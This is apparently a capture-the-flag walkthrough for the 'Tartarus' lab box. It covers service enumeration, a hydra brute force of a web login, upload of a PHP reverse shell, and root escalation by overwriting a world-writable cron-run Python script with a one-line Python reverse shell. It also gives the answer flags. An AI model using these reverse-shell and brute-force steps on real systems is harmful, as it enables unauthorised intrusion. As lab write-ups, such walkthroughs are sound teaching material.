From aldeid
Jump to navigation Jump to search

This is an beginner box based on simple enumeration of services and basic privilege escalation techniques.

User Flag

Services enumeration

Let’s start by discovering the services with Nmap:

21/tcp open  ftp     vsftpd 3.0.3
| ftp-anon: Anonymous FTP login allowed (FTP code 230)
|_-rw-r--r--    1 ftp      ftp            17 Jul 05 21:45 test.txt
| ftp-syst: 
|   STAT: 
| FTP server status:
|      Connected to ::ffff:
|      Logged in as ftp
|      TYPE: ASCII
|      No session bandwidth limit
|      Session timeout in seconds is 300
|      Control connection is plain text
|      Data connections will be plain text
|      At session startup, client count was 4
|      vsFTPd 3.0.3 - secure, fast, stable
|_End of status
22/tcp open  ssh     OpenSSH 7.2p2 Ubuntu 4ubuntu2.8 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   2048 98:6c:7f:49:db:54:cb:36:6d:d5:ff:75:42:4c:a7:e0 (RSA)
|   256 0c:7b:1a:9c:ed:4b:29:f5:3e:be:1c:9a:e4:4c:07:2c (ECDSA)
|_  256 50:09:9f:c0:67:3e:89:93:b0:c9:85:f1:93:89:50:68 (ED25519)
80/tcp open  http    Apache httpd 2.4.18 ((Ubuntu))
|_http-server-header: Apache/2.4.18 (Ubuntu)
|_http-title: Apache2 Ubuntu Default Page: It works
Service Info: OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernel


The FTP service with anonymous access hosts a test file, which is a rabbit hole. Nothing interesting here:

[email protected]:/data/Tartarus$ ftp
Connected to
220 (vsFTPd 3.0.3)
Name ( anonymous
331 Please specify the password.
230 Login successful.
Remote system type is UNIX.
Using binary mode to transfer files.
ftp> ls -la
200 PORT command successful. Consider using PASV.
150 Here comes the directory listing.
drwxr-xr-x    3 ftp      ftp          4096 Jul 05 21:31 .
drwxr-xr-x    3 ftp      ftp          4096 Jul 05 21:31 ..
drwxr-xr-x    3 ftp      ftp          4096 Jul 05 21:31 ...
-rw-r--r--    1 ftp      ftp            17 Jul 05 21:45 test.txt
226 Directory send OK.
ftp> get test.txt -
remote: test.txt
200 PORT command successful. Consider using PASV.
150 Opening BINARY mode data connection for test.txt (17 bytes).
vsftpd test file
226 Transfer complete.
17 bytes received in 0.00 secs (16.9231 kB/s)

Now, something should ring the bell. There is a “…” directory.

ftp> cd "..."
250 Directory successfully changed.
ftp> ls -la
200 PORT command successful. Consider using PASV.
150 Here comes the directory listing.
drwxr-xr-x    2 ftp      ftp          4096 Jul 05 21:31 .
drwxr-xr-x    3 ftp      ftp          4096 Jul 05 21:31 ..
-rw-r--r--    1 ftp      ftp            14 Jul 05 21:45 yougotgoodeyes.txt
226 Directory send OK.

The file in this directory (yougotgoodeyes.txt) tells us about a hidden location (/sUp3r-s3cr3t):

ftp> get yougotgoodeyes.txt -
remote: yougotgoodeyes.txt
200 PORT command successful. Consider using PASV.
150 Opening BINARY mode data connection for yougotgoodeyes.txt (14 bytes).
226 Transfer complete.
14 bytes received in 0.00 secs (15.7692 kB/s)



Accessing the target over port 80/tcp shows a default Apache2 page for Ubuntu, but there is a robots.txt file that discloses a hidden location (/admin-dir), as well as a username (d4rckh):

[email protected]:/data/Tartarus$ curl
User-Agent: *
Disallow : /admin-dir

I told d4rckh we should hide our things deep.

The /admin-dir location hosts 2 files: userid and credentials.txt:

[email protected]:/data/Tartarus$ curl -s | html2text 
****** Index of /admin-dir ******
[[ICO]]       Name             Last_modified    Size Description
[[PARENTDIR]] Parent_Directory                    -  
[[TXT]]       credentials.txt  2020-07-05 21:45  760  
[[   ]]       userid           2020-07-05 21:45   78  
     Apache/2.4.18 (Ubuntu) Server at Port 80


This location hosts an authentication form.

<!DOCTYPE html>
        <meta charset="utf-8">
        <link rel="stylesheet" href="">
        <link href="style.css" rel="stylesheet" type="text/css">
        <div class="login">
            <form action="authenticate.php" method="post">
                <label for="username">
                    <i class="fas fa-user"></i>
                <input type="text" name="username" placeholder="Username" id="username" required>
                <label for="password">
                    <i class="fas fa-lock"></i>
                <input type="password" name="password" placeholder="Password" id="password" required>
                <input type="submit" value="Login">

Let’s use hydra with the 2 files gathered so far to brute force the authentication.

[email protected]:/data/Tartarus/files$ hydra -L userid -P credentials.txt http-post-form "/sUp3r-s3cr3t/authenticate.php:username=^USER^&password=^PASS^:Incorrect"
Hydra v9.0 (c) 2019 by van Hauser/THC - Please do not use in military or secret service organizations, or for illegal purposes.

Hydra ( starting at 2020-08-22 07:32:08
[DATA] max 16 tasks per 1 server, overall 16 tasks, 1313 login tries (l:13/p:101), ~83 tries per task
[DATA] attacking http-post-form://^USER^&password=^PASS^:Incorrect
[80][http-post-form] host:   login: enox   password: [email protected]
1 of 1 target successfully completed, 1 valid password found
Hydra ( finished at 2020-08-22 07:32:40

Let’s authenticate with the credentials found (enox:[email protected]). We are redirected to with an upload form.

Upload form

Let’s upload a PHP reverse shell. Make sure you modify both your IP and port to the PHP file before uploading it.

The reverse shell is uploaded but we don’t know where. Let’s use dirsearch within the /sUp3r-s3cr3t directory to find sub-directories:

[email protected]:/data/Tartarus/files$ /data/src/dirsearch/ -u -E -w /usr/share/wordlists/dirb/common.txt 

 _|. _ _  _  _  _ _|_    v0.3.9
(_||| _) (/_(_|| (_| )

Extensions: php, asp, aspx, jsp, js, html, do, action | HTTP method: get | Threads: 10 | Wordlist size: 4614

Error Log: /data/src/dirsearch/logs/errors-20-08-22_07-43-36.log


[07:43:36] Starting: 
[07:43:37] 200 -  732B  - /sUp3r-s3cr3t/
[07:43:37] 403 -  278B  - /sUp3r-s3cr3t/.hta
[07:43:48] 301 -  328B  - /sUp3r-s3cr3t/images  ->
[07:43:49] 200 -  732B  - /sUp3r-s3cr3t/index.html

Task Completed

Browsing reveals the presence of an uploads subdirectory (/sUp3r-s3cr3t/images/uploads/).

Reverse shell

Let’s run a listener:

$ rlwrap nc -nlvp 4444

And call our reverse shell: We now have a shell:

[email protected]:/data/Tartarus/files$ rlwrap nc -nlvp 4444
listening on [any] 4444 ...
connect to [] from (UNKNOWN) [] 52018
Linux ubuntu-xenial 4.4.0-184-generic #214-Ubuntu SMP Thu Jun 4 10:14:11 UTC 2020 x86_64 x86_64 x86_64 GNU/Linux
 05:46:19 up 24 min,  0 users,  load average: 0.00, 0.01, 0.15
USER     TTY      FROM             [email protected]   IDLE   JCPU   PCPU WHAT
uid=33(www-data) gid=33(www-data) groups=33(www-data)
/bin/sh: 0: can't access tty; job control turned off
$ whoami

User flag

$ cat /home/d4rckh/user.txt

Answer: 0f7dbb2243e692e3ad222bc4eff8521f

Root Flag

Cleanup script

Having a look at d4rckh’s home directory reveals the presence of a script that cleans up the /home/cleanup/ directory.

$ cat
# -*- coding: utf-8 -*-
#!/usr/bin/env python
import os
import sys
    os.system('rm -r /home/cleanup/* ')

This is typically the kind of script that is scheduled via a cron job. Using pspy64, we can confirm that the script is run automatically by root.

2020/08/22 06:06:01 CMD: UID=0    PID=1864   | python /home/d4rckh/ 
2020/08/22 06:06:01 CMD: UID=0    PID=1863   | /bin/sh -c    python /home/d4rckh/ 
2020/08/22 06:06:01 CMD: UID=0    PID=1862   | /usr/sbin/CRON -f 
2020/08/22 06:06:01 CMD: UID=0    PID=1865   | python /home/d4rckh/ 

Moreover, the file is world-writable, which means we can modify it.

$ cd d4rckh
$ ls -ila
total 16
257890 drwxr-xr-x 2 d4rckh d4rckh 4096 Jul  5 21:35 .
  1920 drwxr-xr-x 5 root   root   4096 Jul  5 21:45 ..
259257 -rwxrwxrwx 1 root   root    129 Jul  5 21:45
259258 -rw-r--r-- 1 d4rckh d4rckh   33 Jul  5 21:45 user.txt

Priviledged reverse shell

Let’s take advantage of this vulnerability and replace its content with another reverse shell:

printf 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("",5555));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);["/bin/bash","-i"]);' >

Root flag

In another listener, running on port 5555, we now have a priviledged reverse shell:

cat [email protected]:/data/src$ rlwrap nc -nlvp 5555
listening on [any] 5555 ...
connect to [] from (UNKNOWN) [] 51940
bash: cannot set terminal process group (1602): Inappropriate ioctl for device
bash: no job control in this shell
[email protected]:~# pwd
[email protected]:~# ls
[email protected]:~# cat root.txt
cat root.txt

Answer: 7e055812184a5fa5109d5db5c7eda7cd